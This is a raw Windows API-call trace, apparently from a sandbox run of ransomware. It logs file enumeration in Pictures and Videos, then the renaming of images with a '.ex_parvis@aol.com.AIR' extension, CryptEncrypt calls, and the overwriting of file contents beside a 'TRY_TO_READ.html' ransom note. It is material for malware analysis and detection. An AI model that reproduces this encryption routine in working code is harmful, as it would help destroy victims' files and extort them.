	[0107.063] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1628b010, ftCreationTime.dwHighDateTime=0x1d4d31b, ftLastAccessTime.dwLowDateTime=0xc7858770, ftLastAccessTime.dwHighDateTime=0x1d4ce66, ftLastWriteTime.dwLowDateTime=0xc7858770, ftLastWriteTime.dwHighDateTime=0x1d4ce66, nFileSizeHigh=0x0, nFileSizeLow=0x10ada, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NecOZKdp.bmp", cAlternateFileName="")) returned 1
	[0107.064] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe65b85f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.064] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fbe7770, ftCreationTime.dwHighDateTime=0x1d4c5b0, ftLastAccessTime.dwLowDateTime=0xfe201f70, ftLastAccessTime.dwHighDateTime=0x1d4c731, ftLastWriteTime.dwLowDateTime=0xfe201f70, ftLastWriteTime.dwHighDateTime=0x1d4c731, nFileSizeHigh=0x0, nFileSizeLow=0x4399, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKQzXUx-PHSpLmpfoFh.bmp", cAlternateFileName="UKQZXU~1.BMP")) returned 1
	[0107.064] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6db76da0, ftCreationTime.dwHighDateTime=0x1d4cf09, ftLastAccessTime.dwLowDateTime=0x14bcb8d0, ftLastAccessTime.dwHighDateTime=0x1d4c9ab, ftLastWriteTime.dwLowDateTime=0x14bcb8d0, ftLastWriteTime.dwHighDateTime=0x1d4c9ab, nFileSizeHigh=0x0, nFileSizeLow=0x9930, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WNI8.bmp", cAlternateFileName="")) returned 1
	[0107.064] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6db76da0, ftCreationTime.dwHighDateTime=0x1d4cf09, ftLastAccessTime.dwLowDateTime=0x14bcb8d0, ftLastAccessTime.dwHighDateTime=0x1d4c9ab, ftLastWriteTime.dwLowDateTime=0x14bcb8d0, ftLastWriteTime.dwHighDateTime=0x1d4c9ab, nFileSizeHigh=0x0, nFileSizeLow=0x9930, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WNI8.bmp", cAlternateFileName="")) returned 0
	[0107.064] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.064] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.064] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp", dwFileAttributes=0x80) returned 1
	[0107.064] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp") returned 68
	[0107.064] GetProcessHeap () returned 0x540000
	[0107.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x597dc8
	[0107.064] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp"
	[0107.064] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.064] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\wni8.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\wni8.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.067] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\WNI8.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\wni8.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558
	[0107.067] GetProcessHeap () returned 0x540000
	[0107.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0107.067] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=39216) returned 1
	[0107.067] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9930
	[0107.067] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.067] GetProcessHeap () returned 0x540000
	[0107.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.068] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.068] WriteFile (in: hFile=0x558, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.069] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.069] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.069] ReadFile (in: hFile=0x558, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x9930, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x9930, lpOverlapped=0x0) returned 1
	[0107.070] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.070] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.070] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp", dwFileAttributes=0x80) returned 1
	[0107.070] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp") returned 83
	[0107.070] GetProcessHeap () returned 0x540000
	[0107.070] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10c) returned 0x57fb28
	[0107.070] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp"
	[0107.070] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.070] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\ukqzxux-phsplmpfofh.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\ukqzxux-phsplmpfofh.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.075] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\UKQzXUx-PHSpLmpfoFh.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\ukqzxux-phsplmpfofh.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558
	[0107.075] GetProcessHeap () returned 0x540000
	[0107.075] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.075] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17305) returned 1
	[0107.075] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4399
	[0107.075] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.075] GetProcessHeap () returned 0x540000
	[0107.075] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.075] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.075] WriteFile (in: hFile=0x558, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.076] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.076] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.076] ReadFile (in: hFile=0x558, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x4399, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x4399, lpOverlapped=0x0) returned 1
	[0107.076] SetFilePointer (in: hFile=0x558, lDistanceToMove=-17305, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.077] WriteFile (in: hFile=0x558, lpBuffer=0x37b53f0*, nNumberOfBytesToWrite=0x4399, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b53f0*, lpNumberOfBytesWritten=0x3a1f778*=0x4399, lpOverlapped=0x0) returned 1
	[0107.077] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.077] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.077] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp", dwFileAttributes=0x80) returned 1
	[0107.077] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp") returned 72
	[0107.077] GetProcessHeap () returned 0x540000
	[0107.077] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf6) returned 0x57fb28
	[0107.077] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp"
	[0107.077] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.077] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\necozkdp.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\necozkdp.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.079] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\NecOZKdp.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\necozkdp.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558
	[0107.080] GetProcessHeap () returned 0x540000
	[0107.080] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.080] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=68314) returned 1
	[0107.080] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10ada
	[0107.080] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.080] GetProcessHeap () returned 0x540000
	[0107.080] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.080] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.080] WriteFile (in: hFile=0x558, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.081] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.081] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.081] ReadFile (in: hFile=0x558, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x10ada, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x10ada, lpOverlapped=0x0) returned 1
	[0107.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.083] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif", dwFileAttributes=0x80) returned 1
	[0107.083] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif") returned 70
	[0107.083] GetProcessHeap () returned 0x540000
	[0107.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x597dc8
	[0107.083] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif"
	[0107.083] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.083] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\mhp0za.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\mhp0za.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.086] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\mHP0ZA.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\mhp0za.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558
	[0107.086] GetProcessHeap () returned 0x540000
	[0107.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0107.086] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=23981) returned 1
	[0107.086] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5dad
	[0107.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.086] GetProcessHeap () returned 0x540000
	[0107.086] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.088] WriteFile (in: hFile=0x558, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.089] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.089] WriteFile (in: hFile=0x558, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.089] ReadFile (in: hFile=0x558, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x5dad, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x5dad, lpOverlapped=0x0) returned 1
	[0107.090] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QDILxLZczpyOolOj\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5701b1e0, ftCreationTime.dwHighDateTime=0x1d4ca6a, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe66048b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b01a0
	[0107.090] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5701b1e0, ftCreationTime.dwHighDateTime=0x1d4ca6a, ftLastAccessTime.dwLowDateTime=0xe66048b0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe66048b0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.092] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815f1040, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0xc0955170, ftLastAccessTime.dwHighDateTime=0x1d4d578, ftLastWriteTime.dwLowDateTime=0xc0955170, ftLastWriteTime.dwHighDateTime=0x1d4d578, nFileSizeHigh=0x0, nFileSizeLow=0xf00a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Q-C08DmTzq.mp4", cAlternateFileName="-Q-C08~1.MP4")) returned 1
	[0107.092] FindNextFileW (in: hFindFile=0x37b01a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77c6190, ftCreationTime.dwHighDateTime=0x1d4cfd8, ftLastAccessTime.dwLowDateTime=0x248c0080, ftLastAccessTime.dwHighDateTime=0x1d4cc72, ftLastWriteTime.dwLowDateTime=0x248c0080, ftLastWriteTime.dwHighDateTime=0x1d4cc72, nFileSizeHigh=0x0, nFileSizeLow=0xf668, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5QaUaFvAmh1GSJTo.mp4", cAlternateFileName="5QAUAF~1.MP4")) returned 1
